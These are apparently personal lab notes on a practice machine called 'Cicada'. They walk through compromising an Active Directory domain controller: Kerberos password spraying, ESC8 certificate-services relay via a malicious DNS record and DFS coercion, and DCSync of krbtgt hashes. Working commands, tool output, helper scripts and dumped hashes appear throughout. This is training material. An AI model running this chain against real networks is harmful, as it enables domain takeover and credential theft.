Cicada

This is not a writeup, just my notes about the machine.

Operating System: Windows Server 2022 Standard

Chain: False

Credentials

Username       Password    Method                         Scope
Rosie.Powell   Cicada123   Password Spraying + Kerberos   Domain User

✅ Valid Usernames

Daniel.Marshall
Debra.Wright
Jane.Carter
Jordan.Francis
Joyce.Andrews
Katie.Ward
Megan.Simpson
Richard.Gibbons
Rosie.Powell
Shirley.West

🔑 Passwords list

Cicada123

Information Gathering

Nmap Scan

# Nmap 7.94SVN scan initiated Wed Apr  9 17:10:36 2025 as: nmap -sS -Pn -n -p- -T5 --open -A -oN ext_tcp_cicada_10.10.123.255 -vvv 10.10.123.255
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-09 21:17:07Z)
111/tcp   open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
2049/tcp  open  nlockmgr      syn-ack ttl 127 1-4 (RPC #100021)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49203/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
65409/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
65447/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
65465/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Initial enumeration

DNS

  • Not vulnerable to DNS Zone Transfer.

SMB (enum4linux-ng)

  • Domain: cicada.vl

  • FQDN: DC-JPQ225.cicada.vl

NFS

❯ showmount -e 10.10.123.255
Export list for 10.10.123.255:
/profiles (everyone)
❯ mkdir profiles 
❯ sudo mount -t nfs 10.10.123.255:/profiles profiles -o nolock

Inside the profiles directory there are folders named after possible usernames, plus two images, one of which contains a possible password.

User brute forcing

STATUS_NOT_SUPPORTED: NTLM authentication is disabled on the DC; only Kerberos authentication is accepted.

When NTLM is disabled and Kerberos is enabled you must target the FQDN (DC-JPQ225.cicada.vl), not the IP address: the client derives the SPN from the name you give it, and there is no service ticket for an IP address. The first spray below fails for every user with STATUS_NOT_SUPPORTED regardless of whether the password is right, so the error is not a signal about the credentials.

nxc smb 10.10.123.255 -u users.txt -p 'Cicada123'
SMB         10.10.123.255   445    10.10.123.255    [*]  x64 (name:10.10.123.255) (domain:10.10.123.255) (signing:True) (SMBv1:False)
SMB         10.10.123.255   445    10.10.123.255    [-] 10.10.123.255\Administrator:Cicada123 STATUS_NOT_SUPPORTED
...
...

Brute forcing with Kerberos authentication

❯ nxc smb DC-JPQ225.cicada.vl -u users.txt -p 'Cicada123' -k
<SNIP>
SMB         DC-JPQ225.cicada.vl 445    DC-JPQ225        [+] cicada.vl\Rosie.Powell:Cicada123 
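Added example, not part of the original notes: a small Python helper that turns the Nmap LDAP banner and the FQDN returned by enum4linux-ng into what the Kerberos-only tooling above needs, namely the realm, an /etc/hosts line and a minimal krb5.conf pointing at the DC, and that rejects a bare IP as a target. The sample banner line is copied from the scan above; the function names, the krb5.conf layout and the constructed second banner in the test are my own.

```python
"""Derive realm / hosts entry / krb5.conf from recon output so tools run with
-k can be pointed at DC-JPQ225.cicada.vl instead of the IP (added example)."""
import ipaddress
import re

# Constructed sample: the LDAP line from the Nmap scan in these notes.
NMAP_LINE = ("389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows "
             "Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)")
DC_FQDN = "DC-JPQ225.cicada.vl"   # from enum4linux-ng in these notes
DC_IP = "10.10.123.255"

# Nmap prints the AD domain as 'cicada.vl0.' (trailing '0.' is an artefact of
# its service probe); the optional group strips it so the realm is not bogus.
DOMAIN_RE = re.compile(r"\(Domain:\s*([A-Za-z0-9.-]+?)(?:0\.)?,")


def parse_ad_domain(nmap_line: str) -> str:
    """Return the lower-case AD DNS domain from an Nmap LDAP banner line."""
    m = DOMAIN_RE.search(nmap_line)
    if not m:
        raise ValueError("no AD domain in banner")
    return m.group(1).lower()


def realm_for(domain: str) -> str:
    """AD Kerberos realms are the DNS domain name in upper case."""
    return domain.upper()


def hosts_line(ip: str, fqdn: str) -> str:
    """/etc/hosts entry: FQDN first so reverse lookups return the FQDN."""
    short = fqdn.split(".", 1)[0]
    return f"{ip} {fqdn.lower()} {short.lower()}"


def krb5_conf(domain: str, kdc_fqdn: str) -> str:
    """Minimal krb5.conf for impacket/certipy -k against a single DC.

    dns_lookup_kdc=false and rdns=false avoid SRV lookups and reverse-DNS
    canonicalisation, both of which fail in a lab where only /etc/hosts is set."""
    realm = realm_for(domain)
    kdc = kdc_fqdn.lower()
    return (
        "[libdefaults]\n"
        f"    default_realm = {realm}\n"
        "    dns_lookup_kdc = false\n"
        "    rdns = false\n\n"
        "[realms]\n"
        f"    {realm} = {{\n"
        f"        kdc = {kdc}\n"
        f"        admin_server = {kdc}\n"
        "    }\n\n"
        "[domain_realm]\n"
        f"    .{domain} = {realm}\n"
        f"    {domain} = {realm}\n"
    )


def check_target(target: str) -> str:
    """Reject an IP literal: with NTLM disabled the SPN must come from a hostname."""
    try:
        ipaddress.ip_address(target)
    except ValueError:
        return target          # not an IP, fine to use with -k
    raise ValueError(f"{target} is an IP address; Kerberos needs the FQDN")


if __name__ == "__main__":
    domain = parse_ad_domain(NMAP_LINE)
    print(hosts_line(DC_IP, DC_FQDN))
    print(krb5_conf(domain, DC_FQDN))
    print("target:", check_target(DC_FQDN))
```

Append the hosts line to /etc/hosts and drop the generated stanza into /etc/krb5.conf (or point KRB5_CONFIG at it) before running the `-k` commands; nxc, impacket and certipy all build the SPN from the hostname you pass on the command line.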

Requesting a TGT ticket

❯ impacket-getTGT cicada.vl/Rosie.Powell:'Cicada123' -dc-ip 10.10.123.255 -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Rosie.Powell.ccache
❯ export KRB5CCNAME=~/Documents/Cicada/Content/Rosie.Powell.ccache   # leave ~ unquoted: inside single quotes it is not expanded and the ccache is not found

Discovering Vulnerable ADCS Configuration (ESC8)

❯ certipy-ad find -k -no-pass -vulnerable -stdout -ns 10.10.123.255 -dc-ip DC-JPQ225.cicada.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA
[!] Got error while trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'cicada-DC-JPQ225-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Certificate Subject                 : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
    Certificate Serial Number           : 7AB6BA064BFB22904C868758AF2017D2
    Certificate Validity Start          : 2025-04-09 21:05:46+00:00
    Certificate Validity End            : 2525-04-09 21:15:46+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CICADA.VL\Administrators
      Access Rights
        ManageCertificates              : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        ManageCa                        : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        Enroll                          : CICADA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates                   : [!] Could not find any certificate templates

Compromise Domain Controller from Linux

Adding Malicious DNS Record

The record name is the DC's short hostname followed by the marshaled target-info suffix (see the Format note under "Launching krbrelayx Attack"). The name resolves to the attacker host (10.8.5.48), but when the DC is coerced to connect to it the Windows SMB client strips the suffix and requests a Kerberos ticket for dc-jpq225, i.e. for its own machine account, which krbrelayx then relays to the CA's web enrollment endpoint. Note that the lab DC's IP changed between sessions: 10.10.72.89, 10.10.104.125 and 10.10.123.255 all refer to DC-JPQ225.

#Adding DNS record using dnstool
python3 dnstool.py -k -u 'cicada.vl\Rosie.Powell' -p 'Cicada123' -r 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' -d 10.8.5.48 -a add DC-JPQ225.cicada.vl -dns-ip 10.10.72.89
#Adding DNS record using bloodyAD
bloodyAD -k --host DC-JPQ225.cicada.vl -d cicada.vl -u Rosie.Powell -p 'Cicada123' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.5.48
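Added example, not from the notes, krbrelayx, dnstool or bloodyAD: a Python helper that builds the relay record name from the DC's short hostname and checks the two things that break this step in practice: the prefix must be the name of the machine whose ticket you want relayed (the DC, never the attacker host, and as a single short label like the notes use), and the result must still be a legal DNS label, which caps the prefix at 63 minus the length of the suffix. The suffix is copied from the notes; the function names, checks and constructed inputs are mine.

```python
"""Build and sanity-check the ADIDNS record name used for the Kerberos relay
(added example; the suffix is the one from these notes)."""
import ipaddress
import re
from typing import Tuple

# Marshaled target-info suffix from the notes.  The full name resolves to the
# attacker, but the SMB client strips this suffix and builds the SPN from the
# prefix, so the coerced DC asks the KDC for a ticket to itself.
RELAY_SUFFIX = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"
MAX_LABEL = 63   # RFC 1035 limit for a single DNS label
LABEL_RE = re.compile(r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?$")


def max_hostname_len() -> int:
    """Longest target hostname that still fits in one label with the suffix."""
    return MAX_LABEL - len(RELAY_SUFFIX)


def relay_label(target_host: str) -> str:
    """Return '<target_host><suffix>' after validating the prefix.

    target_host is the short name of the machine whose key the relayed ticket
    must be encrypted with (the DC here).  Only the prefix is lower-cased: the
    suffix is an encoded blob and its case is significant."""
    host = target_host.lower()
    if "." in host:
        raise ValueError("use the short host name, not an FQDN")
    if not LABEL_RE.match(host):
        raise ValueError(f"{host!r} is not a valid DNS label")
    label = host + RELAY_SUFFIX
    if len(label) > MAX_LABEL:
        raise ValueError(
            f"{host!r} too long: label would be {len(label)} > {MAX_LABEL} "
            f"(max prefix {max_hostname_len()} chars)")
    return label


def relay_record(target_host: str, zone: str, attacker_ip: str) -> Tuple[str, str]:
    """(record FQDN inside the AD zone, A-record value) for dnstool/bloodyAD."""
    ip = ipaddress.ip_address(attacker_ip)
    if ip.version != 4:
        raise ValueError("dnstool/bloodyAD add an A record here: use an IPv4 attacker address")
    return f"{relay_label(target_host)}.{zone.lower()}", str(ip)


if __name__ == "__main__":
    name, value = relay_record("dc-jpq225", "cicada.vl", "10.8.5.48")
    print(f"{name} -> {value}   (prefix limit: {max_hostname_len()} chars)")
```

If the DC's hostname is longer than the limit printed above, the relay name cannot be expressed as one label and this coercion path needs a different trigger; check before spending time on the DNS record.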

Setting Up krbrelayx Environment

❯ git clone https://github.com/dirkjanm/krbrelayx.git
❯ cd krbrelayx
❯ python3 -m venv env
❯ source env/bin/activate

Launching krbrelayx Attack

Format: HOSTNAME1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA, where HOSTNAME is the short name of the machine whose ticket you want relayed (the DC, dc-jpq225) and the rest is the fixed marshaled target-info suffix.

python krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$' 2>/dev/null
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80

[*] Setting up DNS Server
[*] Servers started, waiting for connections

Triggering Coercion via DFS

❯ KRB5CCNAME='Rosie.Powell.ccache' python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl
#Output shown in the krbrelayx.py terminal once dfscoerce.py triggers the DC.
[*] SMBD: Received connection from 10.10.123.255
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.10.123.255
[*] HTTP server returned status code 200, treating as a successful login
[*] Skipping user DC-JPQ225$ since attack was already performed
[*] GOT CERTIFICATE! ID 15
[*] Writing PKCS#12 certificate to ./DC-JPQ225$.pfx
[*] Certificate successfully written to file

Path: certipy-ad

Retrieving domain controller NT Hash

❯ certipy-ad auth -username 'DC-JPQ225$' -pfx DC-JPQ225\$.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: dc-jpq225$@cicada.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45f

Requesting domain controller Ticket Granting Ticket

❯ impacket-getTGT cicada.vl/'dc-jpq225$' -hashes 'aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45f'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in dc-jpq225$.ccache

Performing DCSync Attack against domain controller

❯ KRB5CCNAME='dc-jpq225$.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -dc-ip 10.10.72.89 -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
[*] Cleaning up... 

Path: PKINITtools

Requesting TGT Using PKINIT and PFX Certificate

Use a Python virtual environment and install the requirements of PKINITtools first.

❯ python gettgtpkinit.py -cert-pfx ../krbrelayx/DC-JPQ225\$.pfx 'cicada.vl/DC-JPQ225$' dc.ccache
2025-04-14 00:20:51,783 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-04-14 00:20:52,087 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-04-14 00:20:52,443 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-04-14 00:20:52,443 minikerberos INFO     5ef899aa9751b0343c82c19152c592e95a24b1ce56fd0fc3ef9596a77f1b1d47
INFO:minikerberos:5ef899aa9751b0343c82c19152c592e95a24b1ce56fd0fc3ef9596a77f1b1d47
2025-04-14 00:20:52,445 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Dumping Domain Secrets with secretsdump

❯ KRB5CCNAME='dc.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
[*] Cleaning up... 

Compromise Domain Controller from Windows

Setting up DNS (the Windows host must resolve cicada.vl through the DC).

Joining the Windows host to the domain.

Launching RemoteKrbRelay attack

PS C:\Temp> RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3

                            /\_/\____,
                  ,___/\_/\ \  ~     /
                  \     ~  \ )   XXX
                    XXX     /    /\_/\___,
                       \o-o/-o-o/   ~    /
                        ) /     \    XXX
                       _|    / \ \_/
                    ,-/   _  \_/   \
                   / (   /____,__|  )
                  (  |_ (    )  \) _|
                 _/ _)   \   \__/   (_
                (,-(,(,(,/      \,),),)

                CICADA8 Research Team
                From Michael Zhmaylo (MzHmO)
[+] Setting UP Rogue COM at port 12345
[+] Registering...
[+] Register success
[+] Forcing Authentication
[+] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 6082071f06...
[+] Got Krb Auth from NT/System. Relaying to ADCS now...
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, Confidentiality, UseDceStyle, Connection
[+] Received Kerberos Auth from dc-jpq225.cicada.vl with ticket on http/dc-jpq225.cicada.vl
[*] apRep2: 6f5b305...
[+] HTTP session established
[+] Cookie ASPSESSIONIDSSDRDQTA=IHPNGIODCGPMFFNKEE...; path=/
[+] Lets get certificate for "cicada.vl\dc-jpq225$" using "DomainController" template
[+] Success (ReqID: 17)

Writing the base64 certificate string from the RemoteKrbRelay output into a PKCS#12 file.

echo -ne "MIIC8DCCAdigAwIBAgI<SNIP>" | base64 -d > cert.p12

Obtaining Domain Controller NT Hash

certipy auth -pfx cert.p12 -dc-ip 10.10.104.125 -domain cicada.vl

[*] Using principal: dc-jpq225$@cicada.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45f

export KRB5CCNAME=dc-jpq225.ccache

Performing DCSync Attack against Domain Controller.

❯ KRB5CCNAME='dc-jpq225.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -dc-ip 10.10.104.125 -just-dc-user krbtgt   # ccache name and DC IP as saved/used in this session
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
